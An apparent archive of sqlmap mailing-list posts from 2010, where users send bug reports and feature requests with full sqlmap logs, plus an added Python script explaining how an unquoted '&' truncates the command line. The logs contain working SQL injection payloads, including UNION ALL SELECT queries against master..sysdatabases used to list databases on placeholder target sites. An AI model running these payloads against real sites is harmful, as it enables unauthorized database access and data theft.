'cat' is not recognized as an internal or external command, operable program or batch file.

I do the command just like in the manual and it still doesn't work. |
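Alessandro's one-line answer is the whole diagnosis: the unquoted URL contains `&`, which the shell reads as a command separator, so sqlmap only ever received `ks.php?mode=cat` (which is why only the `mode` parameter was tested) and cmd.exe then tried to run `cat=26` as a second command, producing the "'cat' is not recognized" line in Brandon's paste. The script below is an added example written for this archive page; it is not sqlmap code and not from either poster. It uses the standard library's shlex module (Python 3.8 or newer) to tokenise the command line under POSIX-shell rules, where an unquoted `&` is an operator token just as it is a separator in cmd.exe, and then builds the correctly quoted line with shlex.quote. The host name is a constructed placeholder.

```python
"""Why an unquoted '&' in a URL argument truncates a sqlmap command line.

Added example, not sqlmap code.  The shell tokeniser is modelled with
shlex in punctuation_chars mode (POSIX rules, Python 3.8+); cmd.exe also
ends the command at an unquoted '&', which is what the original report
shows.  The host name below is a constructed placeholder.
"""
import shlex

# Constructed sample URL; the host is a placeholder, not a real site.
URL = "http://vulnsite.example/ks.php?mode=cat&cat=26"

# Tokens that end one command and start another (or a background job).
SHELL_OPERATORS = {"&", "&&", "|", "||", ";"}


def shell_words(command_line):
    """Split a command line the way a POSIX shell does: quotes are honoured
    and stripped, and operator characters become tokens of their own
    instead of staying attached to the surrounding word."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep ':' '?' ',' etc. inside words
    return list(lexer)


def url_seen_by_sqlmap(command_line):
    """Return the argument that follows -u after shell processing, i.e.
    the URL the tool actually receives, or None if there is none."""
    words = shell_words(command_line)
    for i, word in enumerate(words[:-1]):
        if word == "-u":
            return words[i + 1]
    return None


def splits_into_commands(command_line):
    """True if the shell would cut this line into more than one command."""
    return any(word in SHELL_OPERATORS for word in shell_words(command_line))


def safe_command(url, *extra_args):
    """Build the sqlmap command line with every argument shell-quoted."""
    args = ("-u", url) + extra_args
    return "sqlmap " + " ".join(shlex.quote(a) for a in args)


if __name__ == "__main__":
    unquoted = "sqlmap -u " + URL + " -v 1 -p mode,cat"
    quoted = safe_command(URL, "-v", "1", "-p", "mode,cat")
    for label, line in (("unquoted", unquoted), ("quoted", quoted)):
        print(label, "->", line)
        print("  tokens:", shell_words(line))
        print("  URL received:", url_seen_by_sqlmap(line))
        print("  split into several commands:", splits_into_commands(line))
```

Run it and the unquoted line tokenises to `-u http://vulnsite.example/ks.php?mode=cat`, then `&`, then `cat=26`, exactly the truncation the log shows; the quoted line delivers the full URL as one argument. shlex.quote emits single quotes, which is right for a POSIX shell; in cmd.exe wrap the URL in double quotes instead.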
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-19 08:48:11
|
Yesterday we committed to Subversion the very early support for Microsoft Access; we will be working on it soon.

Bernardo

On Fri, Mar 19, 2010 at 05:05, Brandon <bmu...@gm...> wrote:
> I was wondering if you can please implement Microsoft Access?
>
> C:\sqlmap8>sqlmap -u http://www.vulnsite.com/forum.asp?id=11 --current-user
> -v 2
>
> sqlmap/0.8 - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 00:53:35
>
> [00:53:35] [DEBUG] initializing the configuration
> [00:53:35] [DEBUG] initializing the knowledge base
> [00:53:35] [DEBUG] cleaning up configuration parameters
> [00:53:35] [DEBUG] setting the HTTP timeout
> [00:53:35] [DEBUG] setting the HTTP method to GET
> [00:53:35] [DEBUG] creating HTTP requests opener object
> [00:53:35] [DEBUG] parsing XML queries file
> [00:53:35] [INFO] using 'C:\sqlmap8\output\www.vulnsite.com\session' as
> session file
> [00:53:35] [INFO] testing connection to the target url
> [00:53:37] [INFO] testing if the url is stable, wait a few seconds
> [00:53:41] [INFO] url is stable
> [00:53:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [00:53:43] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [00:53:43] [INFO] testing if Cookie parameter 'ASPSESSIONIDASAAARCB' is
> dynamic
> [00:53:45] [WARNING] Cookie parameter 'ASPSESSIONIDASAAARCB' is not dynamic
> [00:53:45] [INFO] testing if GET parameter 'forumid' is dynamic
> [00:53:45] [DEBUG] got HTTP error code: 500
> [00:53:45] [DEBUG] setting match ratio to default value 0.900
> [00:53:45] [INFO] confirming that GET parameter 'forumid' is dynamic
> [00:53:46] [DEBUG] got HTTP error code: 500
> [00:53:47] [DEBUG] got HTTP error code: 500
> [00:53:47] [INFO] GET parameter 'forumid' is dynamic
> [00:53:47] [INFO] testing sql injection on GET parameter 'forumid' with 0
> parenthesis
> [00:53:47] [INFO] testing unescaped numeric injection on GET parameter
> 'forumid'
> [00:53:49] [DEBUG] got HTTP error code: 500
> [00:53:49] [INFO] confirming unescaped numeric injection on GET parameter
> 'forumid'
> [00:53:50] [DEBUG] got HTTP error code: 500
> [00:53:50] [INFO] GET parameter 'forumid' is unescaped numeric injectable
> with 0 parenthesis
> [00:53:50] [INFO] testing for parenthesis on injectable parameter
> [00:53:51] [DEBUG] got HTTP error code: 500
> [00:53:51] [DEBUG] got HTTP error code: 500
> [00:53:52] [DEBUG] got HTTP error code: 500
> [00:53:52] [INFO] the injectable parameter requires 0 parenthesis
> [00:53:52] [INFO] testing MySQL
> [00:53:53] [DEBUG] got HTTP error code: 500
> [00:53:53] [WARNING] the back-end DMBS is not MySQL
> [00:53:53] [INFO] testing Oracle
> [00:53:54] [DEBUG] got HTTP error code: 500
> [00:53:54] [WARNING] the back-end DMBS is not Oracle
> [00:53:54] [INFO] testing PostgreSQL
> [00:53:54] [DEBUG] got HTTP error code: 500
> [00:53:54] [WARNING] the back-end DMBS is not PostgreSQL
> [00:53:54] [INFO] testing Microsoft SQL Server
> [00:53:55] [DEBUG] got HTTP error code: 500
> [00:53:55] [WARNING] the back-end DMBS is not Microsoft SQL Server
> [00:53:55] [ERROR] sqlmap was not able to fingerprint the back-end database
> management system,
> but from the HTML error page it was possible to determinate that
> the back-end DBMS is Microsoft Access. Support for this DBMS will be
> implemented
> if you ask, just drop us an email
>
> [*] shutting down at: 00:53:55
>

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Brandon <bmu...@gm...> - 2010-03-19 05:30:37
|
I am having a problem auditing the cat param. It appears it audits the param before it but totally ignores the params after it and shuts down.

C:\sqlmap8>sqlmap -u vulnsite.org/ks.php?mode=cat&cat=26 -v 1 \
-p "mode,cat"

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 01:25:31

[01:25:31] [INFO] using 'C:\sqlmap8\output\vulnsite.org\session' as session file
[01:25:31] [INFO] testing connection to the target url
[01:25:33] [INFO] testing if the url is stable, wait a few seconds
[01:25:39] [INFO] url is stable
[01:25:39] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[01:25:41] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[01:25:41] [INFO] testing if GET parameter 'mode' is dynamic
[01:25:48] [WARNING] GET parameter 'mode' is not dynamic

[*] shutting down at: 01:25:48

'cat' is not recognized as an internal or external command, operable program or batch file.

I do the command just like in the manual and it still doesn't work. |
From: Brandon <bmu...@gm...> - 2010-03-19 05:05:44
|
I was wondering if you can please implement Microsoft Access?

C:\sqlmap8>sqlmap -u http://www.vulnsite.com/forum.asp?id=11 --current-user -v 2

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 00:53:35

[00:53:35] [DEBUG] initializing the configuration
[00:53:35] [DEBUG] initializing the knowledge base
[00:53:35] [DEBUG] cleaning up configuration parameters
[00:53:35] [DEBUG] setting the HTTP timeout
[00:53:35] [DEBUG] setting the HTTP method to GET
[00:53:35] [DEBUG] creating HTTP requests opener object
[00:53:35] [DEBUG] parsing XML queries file
[00:53:35] [INFO] using 'C:\sqlmap8\output\www.vulnsite.com\session' as session file
[00:53:35] [INFO] testing connection to the target url
[00:53:37] [INFO] testing if the url is stable, wait a few seconds
[00:53:41] [INFO] url is stable
[00:53:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[00:53:43] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[00:53:43] [INFO] testing if Cookie parameter 'ASPSESSIONIDASAAARCB' is dynamic
[00:53:45] [WARNING] Cookie parameter 'ASPSESSIONIDASAAARCB' is not dynamic
[00:53:45] [INFO] testing if GET parameter 'forumid' is dynamic
[00:53:45] [DEBUG] got HTTP error code: 500
[00:53:45] [DEBUG] setting match ratio to default value 0.900
[00:53:45] [INFO] confirming that GET parameter 'forumid' is dynamic
[00:53:46] [DEBUG] got HTTP error code: 500
[00:53:47] [DEBUG] got HTTP error code: 500
[00:53:47] [INFO] GET parameter 'forumid' is dynamic
[00:53:47] [INFO] testing sql injection on GET parameter 'forumid' with 0 parenthesis
[00:53:47] [INFO] testing unescaped numeric injection on GET parameter 'forumid'
[00:53:49] [DEBUG] got HTTP error code: 500
[00:53:49] [INFO] confirming unescaped numeric injection on GET parameter 'forumid'
[00:53:50] [DEBUG] got HTTP error code: 500
[00:53:50] [INFO] GET parameter 'forumid' is unescaped numeric injectable with 0 parenthesis
[00:53:50] [INFO] testing for parenthesis on injectable parameter
[00:53:51] [DEBUG] got HTTP error code: 500
[00:53:51] [DEBUG] got HTTP error code: 500
[00:53:52] [DEBUG] got HTTP error code: 500
[00:53:52] [INFO] the injectable parameter requires 0 parenthesis
[00:53:52] [INFO] testing MySQL
[00:53:53] [DEBUG] got HTTP error code: 500
[00:53:53] [WARNING] the back-end DMBS is not MySQL
[00:53:53] [INFO] testing Oracle
[00:53:54] [DEBUG] got HTTP error code: 500
[00:53:54] [WARNING] the back-end DMBS is not Oracle
[00:53:54] [INFO] testing PostgreSQL
[00:53:54] [DEBUG] got HTTP error code: 500
[00:53:54] [WARNING] the back-end DMBS is not PostgreSQL
[00:53:54] [INFO] testing Microsoft SQL Server
[00:53:55] [DEBUG] got HTTP error code: 500
[00:53:55] [WARNING] the back-end DMBS is not Microsoft SQL Server
[00:53:55] [ERROR] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Support for this DBMS will be implemented if you ask, just drop us an email

[*] shutting down at: 00:53:55 |
From: David G. <sk...@gm...> - 2010-03-19 02:52:58
|
The problem happens because, when sqlmap performs the resume of the UNIONSQLi session, sqlmap does not check if it already has the number of dbs, tables or columns before attempting to retrieve their names through UNIONSQLi.

On Thu, Mar 18, 2010 at 11:23 PM, David Guimaraes <sk...@gm...> wrote:
> # svn info
> Path: .
> URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
> Repository Root: https://svn.sqlmap.org/sqlmap
> Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
> Revision: 1497
> Node Kind: directory
> Schedule: normal
> Last Changed Author: inquisb
> Last Changed Rev: 1497
> Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010)
>
>
> On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote:
>> When I try to run the sqlmap this way:
>>
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u
>> "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021"
>> -p art --string WRAPED
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 22:53:24
>>
>> [22:53:24] [DEBUG] initializing the configuration
>> [22:53:24] [DEBUG] initializing the knowledge base
>> [22:53:24] [DEBUG] cleaning up configuration parameters
>> [22:53:24] [DEBUG] setting the HTTP timeout
>> [22:53:24] [DEBUG] setting the HTTP method to GET
>> [22:53:24] [DEBUG] creating HTTP requests opener object
>> [22:53:24] [DEBUG] parsing XML queries file
>> [22:53:24] [INFO] using
>> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
>> file
>> [22:53:24] [INFO] testing connection to the target url
>> [22:53:25] [INFO] testing if the provided string is within the target
>> URL page content
>> [22:53:29] [WARNING] the testable parameter 'art' you provided is not
>> into the Cookie
>> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0
>> parenthesis
>> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
>> [22:53:29] [DEBUG] got HTTP error code: 500
>> [22:53:30] [DEBUG] got HTTP error code: 500
>> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
>> [22:53:30] [DEBUG] got HTTP error code: 500
>> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable
>> with 0 parenthesis
>> [22:53:30] [INFO] testing for parenthesis on injectable parameter
>> [22:53:31] [DEBUG] got HTTP error code: 500
>> [22:53:31] [DEBUG] got HTTP error code: 500
>> [22:53:32] [DEBUG] got HTTP error code: 500
>> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis
>> [22:53:32] [INFO] testing MySQL
>> [22:53:32] [DEBUG] got HTTP error code: 500
>> [22:53:32] [WARNING] the back-end DMBS is not MySQL
>> [22:53:32] [INFO] testing Oracle
>> [22:53:33] [DEBUG] got HTTP error code: 500
>> [22:53:33] [WARNING] the back-end DMBS is not Oracle
>> [22:53:33] [INFO] testing PostgreSQL
>> [22:53:33] [DEBUG] got HTTP error code: 500
>> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
>> [22:53:33] [INFO] testing Microsoft SQL Server
>> [22:53:34] [DEBUG] got HTTP error code: 500
>> [22:53:34] [INFO] confirming Microsoft SQL Server
>> [22:53:35] [DEBUG] got HTTP error code: 500
>> [22:53:35] [DEBUG] got HTTP error code: 500
>> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with
>> NULL bruteforcing technique
>> [22:53:39] [DEBUG] got HTTP error code: 500
>> [22:53:39] [DEBUG] got HTTP error code: 500
>> [22:53:40] [DEBUG] got HTTP error code: 500
>> [22:53:40] [DEBUG] got HTTP error code: 500
>> [22:53:44] [DEBUG] got HTTP error code: 500
>> [22:53:44] [DEBUG] got HTTP error code: 500
>> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
>> [22:53:45] [DEBUG] got HTTP error code: 500
>> [22:53:45] [DEBUG] got HTTP error code: 500
>> [22:53:46] [DEBUG] got HTTP error code: 500
>> [22:53:46] [DEBUG] got HTTP error code: 500
>> [22:53:47] [DEBUG] got HTTP error code: 500
>> [22:53:47] [DEBUG] got HTTP error code: 500
>> [22:53:47] [WARNING] the target url is not affected by an exploitable
>> full inband sql injection vulnerability
>> [22:53:47] [INFO] confirming partial (single entry) inband sql
>> injection on parameter 'art' by appending a false condition after the
>> parameter value
>> [22:53:48] [DEBUG] got HTTP error code: 500
>> [22:53:49] [DEBUG] got HTTP error code: 500
>> [22:53:49] [DEBUG] got HTTP error code: 500
>> [22:53:49] [INFO] the target url is affected by an exploitable partial
>> (single entry) inband sql injection vulnerability
>> valid union:
>> 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'
>>
>> [22:53:49] [INFO] Fetched data logged to text files under
>> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 22:53:49
>>
>> It notes correctly the UNIONSQLi and ends OK. Soon after that, I try to
>> recover the database by including only the argument "--dbs" and it cannot
>> recover it with the UNIONSQLi, for the strange reason described
>> below, and goes to the BLINDSQLi. It tries to find the right table name
>> without first knowing how many there really are through the use of the
>> UNIONSQLi, and directly tries to find out how many there are and their
>> names using the BLINDSQLi.
>>
>> Example with resume:
>>
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u
>> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021"
>> -p art --string WRAPED --dbs
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 22:54:40
>>
>> [22:54:40] [DEBUG] initializing the configuration
>> [22:54:40] [DEBUG] initializing the knowledge base
>> [22:54:40] [DEBUG] cleaning up configuration parameters
>> [22:54:40] [DEBUG] setting the HTTP timeout
>> [22:54:40] [DEBUG] setting the HTTP method to GET
>> [22:54:40] [DEBUG] creating HTTP requests opener object
>> [22:54:40] [DEBUG] parsing XML queries file
>> [22:54:40] [INFO] using
>> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
>> file
>> [22:54:40] [INFO] resuming string match 'WRAPED' from session file
>> [22:54:40] [INFO] resuming injection point 'GET' from session file
>> [22:54:40] [INFO] resuming injection parameter 'art' from session file
>> [22:54:40] [INFO] resuming injection type 'numeric' from session file
>> [22:54:40] [INFO] resuming 0 number of parenthesis from session file
>> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005'
>> from session file
>> [22:54:40] [INFO] resuming union comment '--' from session file
>> [22:54:40] [INFO] resuming union count 6 from session file
>> [22:54:40] [INFO] resuming union position 2 from session file
>> [22:54:40] [INFO] testing connection to the target url
>> [22:54:43] [WARNING] the testable parameter 'art' you provided is not
>> into the Cookie
>> [22:54:43] [INFO] testing for parenthesis on injectable parameter
>> [22:54:43] [DEBUG] skipping test for MySQL
>> [22:54:43] [DEBUG] skipping test for Oracle
>> [22:54:43] [DEBUG] skipping test for PostgreSQL
>> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [22:54:43] [INFO] fetching database names
>> [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL,
>> CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name
>> AS VARCHAR(8000)),
>> CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109),
>> NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796
>> [22:54:44] [DEBUG] got HTTP error code: 500
>> [22:54:45] [WARNING] for some reasons it was not possible to retrieve
>> the query output through inband SQL injection technique, sqlmap is
>> going blind
>> [22:54:45] [INFO] fetching number of databases
>> [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name)))
>> AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
>> [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500
>> [22:54:48] [DEBUG] got HTTP error code: 500
>> .
>> .
>> .
>> [23:12:13] [DEBUG] performed 42 queries in 16 seconds
>> available databases [3]:
>> [*] mXX
>> [*] pXX
>> [*] tXX
>>
>> [23:12:13] [INFO] Fetched data logged to text files under
>> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 23:12:13
>>
>> But if I delete the session and send the sqlmap start over with the
>> "--dbs" activated, it correctly retrieves how many databases and their
>> names using the correct technique (UNIONSQLi).
>>
>> Example without resume (using --dbs first time):
>> # rm -rf output/*
>> # ./sqlmap.py --threads 20 -v 2 --union-use -u
>> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021"
>> -p art --string WRAPED --dbs
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 23:16:02
>>
>> [23:16:02] [DEBUG] initializing the configuration
>> [23:16:02] [DEBUG] initializing the knowledge base
>> [23:16:02] [DEBUG] cleaning up configuration parameters
>> [23:16:02] [DEBUG] setting the HTTP timeout
>> [23:16:02] [DEBUG] setting the HTTP method to GET
>> [23:16:02] [DEBUG] creating HTTP requests opener object
>> [23:16:02] [DEBUG] parsing XML queries file
>> [23:16:02] [INFO] using
>> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
>> file
>> [23:16:02] [INFO] testing connection to the target url
>> [23:16:02] [INFO] testing if the provided string is within the target
>> URL page content
>> [23:16:03] [WARNING] the testable parameter 'art' you provided is not
>> into the Cookie
>> [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0
>> parenthesis
>> [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art'
>> [23:16:04] [DEBUG] got HTTP error code: 500
>> [23:16:04] [DEBUG] got HTTP error code: 500
>> [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art'
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable
>> with 0 parenthesis
>> [23:16:05] [INFO] testing for parenthesis on injectable parameter
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:05] [DEBUG] got HTTP error code: 500
>> [23:16:06] [DEBUG] got HTTP error code: 500
>> [23:16:06] [INFO] the injectable parameter requires 0 parenthesis
>> [23:16:06] [INFO] testing MySQL
>> [23:16:06] [DEBUG] got HTTP error code: 500
>> [23:16:06] [WARNING] the back-end DMBS is not MySQL
>> [23:16:06] [INFO] testing Oracle
>> [23:16:07] [DEBUG] got HTTP error code: 500
>> [23:16:07] [WARNING] the back-end DMBS is not Oracle
>> [23:16:07] [INFO] testing PostgreSQL
>> [23:16:07] [DEBUG] got HTTP error code: 500
>> [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL
>> [23:16:07] [INFO] testing Microsoft SQL Server
>> [23:16:08] [DEBUG] got HTTP error code: 500
>> [23:16:08] [INFO] confirming Microsoft SQL Server
>> [23:16:14] [DEBUG] got HTTP error code: 500
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows 2000
>> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
>> back-end DBMS: Microsoft SQL Server 2005
>>
>> [23:16:15] [INFO] testing inband sql injection on parameter 'art' with
>> NULL bruteforcing technique
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:15] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:16] [DEBUG] got HTTP error code: 500
>> [23:16:17] [DEBUG] got HTTP error code: 500
>> [23:16:17] [INFO] confirming full inband sql injection on parameter 'art'
>> [23:16:17] [DEBUG] got HTTP error code: 500
>> [23:16:18] [DEBUG] got HTTP error code: 500
>> [23:16:18] [DEBUG] got HTTP error code: 500
>> [23:16:19] [DEBUG] got HTTP error code: 500
>> [23:16:19] [DEBUG] got HTTP error code: 500
>> [23:16:20] [DEBUG] got HTTP error code: 500
>> [23:16:20] [WARNING] the target url is not affected by an exploitable
>> full inband sql injection vulnerability
>> [23:16:20] [INFO] confirming partial (single entry) inband sql
>> injection on parameter 'art' by appending a false condition after the
>> parameter value
>> [23:16:21] [DEBUG] got HTTP error code: 500
>> [23:16:22] [DEBUG] got HTTP error code: 500
>> [23:16:27] [DEBUG] got HTTP error code: 500
>> [23:16:27] [INFO] the target url is affected by an exploitable partial
>> (single entry) inband sql injection vulnerability
>> valid union:
>> 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716'
>>
>> [23:16:27] [INFO] fetching database names
>> [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL,
>> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name)
>> AS VARCHAR(8000)),
>> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
>> NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578
>> [23:16:28] [DEBUG] got HTTP error code: 500
>> [23:16:28] [DEBUG] performed 1 queries in 0 seconds
>> [23:16:28] [INFO] the SQL query provided returns 3 entries
>> [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL,
>> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
>> AS VARCHAR(8000)),
>> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
>> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
>> TOP 0 name FROM master..sysdatabases)-- AND 7328=7328
>> [23:16:31] [DEBUG] got HTTP error code: 500
>> [23:16:31] [DEBUG] performed 2 queries in 3 seconds
>> [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL,
>> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
>> AS VARCHAR(8000)),
>> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
>> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
>> TOP 1 name FROM master..sysdatabases)-- AND 1346=1346
>> [23:16:32] [DEBUG] got HTTP error code: 500
>> [23:16:32] [DEBUG] performed 3 queries in 0 seconds
>> [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL,
>> CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name
>> AS VARCHAR(8000)),
>> CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101),
>> NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT
>> TOP 2 name FROM master..sysdatabases)-- AND 231=231
>> [23:16:33] [DEBUG] got HTTP error code: 500
>> [23:16:33] [DEBUG] performed 4 queries in 1 seconds
>> available databases [3]:
>> [*] mXX
>> [*] pXX
>> [*] tXX
>>
>> [23:16:33] [INFO] Fetched data logged to text files under
>> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>>
>> [*] shutting down at: 23:16:33
>>
>> The same thing happens if I send sqlmap to dump the tables (--tables).
>> If I do not pass --tables the first time it runs and discovers the
>> vulnerability, when it runs again with the resumed file, it just goes
>> right for BLINDSQLi, taking much longer to complete the task!
>>
>> --
>> David Gomes Guimarães
>>
>
>
> --
> David Gomes Guimarães
>

--
David Gomes Guimarães |
From: David G. <sk...@gm...> - 2010-03-19 02:24:20
|
# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1497
Node Kind: directory
Schedule: normal
Last Changed Author: inquisb
Last Changed Rev: 1497
Last Changed Date: 2010-03-18 14:36:58 -0300 (Thu, 18 Mar 2010)

On Thu, Mar 18, 2010 at 11:22 PM, David Guimaraes <sk...@gm...> wrote:
> When I try to run the sqlmap this way:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u
> "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021"
> -p art --string WRAPED
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:53:24
>
> [22:53:24] [DEBUG] initializing the configuration
> [22:53:24] [DEBUG] initializing the knowledge base
> [22:53:24] [DEBUG] cleaning up configuration parameters
> [22:53:24] [DEBUG] setting the HTTP timeout
> [22:53:24] [DEBUG] setting the HTTP method to GET
> [22:53:24] [DEBUG] creating HTTP requests opener object
> [22:53:24] [DEBUG] parsing XML queries file
> [22:53:24] [INFO] using
> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
> file
> [22:53:24] [INFO] testing connection to the target url
> [22:53:25] [INFO] testing if the provided string is within the target
> URL page content
> [22:53:29] [WARNING] the testable parameter 'art' you provided is not
> into the Cookie
> [22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0
> parenthesis
> [22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
> [22:53:29] [DEBUG] got HTTP error code: 500
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
> [22:53:30] [DEBUG] got HTTP error code: 500
> [22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable
> with 0 parenthesis
> [22:53:30] [INFO] testing for parenthesis on injectable parameter
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:31] [DEBUG] got HTTP error code: 500
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [INFO] the injectable parameter requires 0 parenthesis
> [22:53:32] [INFO] testing MySQL
> [22:53:32] [DEBUG] got HTTP error code: 500
> [22:53:32] [WARNING] the back-end DMBS is not MySQL
> [22:53:32] [INFO] testing Oracle
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not Oracle
> [22:53:33] [INFO] testing PostgreSQL
> [22:53:33] [DEBUG] got HTTP error code: 500
> [22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
> [22:53:33] [INFO] testing Microsoft SQL Server
> [22:53:34] [DEBUG] got HTTP error code: 500
> [22:53:34] [INFO] confirming Microsoft SQL Server
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [DEBUG] got HTTP error code: 500
> [22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
> [22:53:35] [INFO] testing inband sql injection on parameter 'art' with
> NULL bruteforcing technique
> [22:53:39] [DEBUG] got HTTP error code: 500
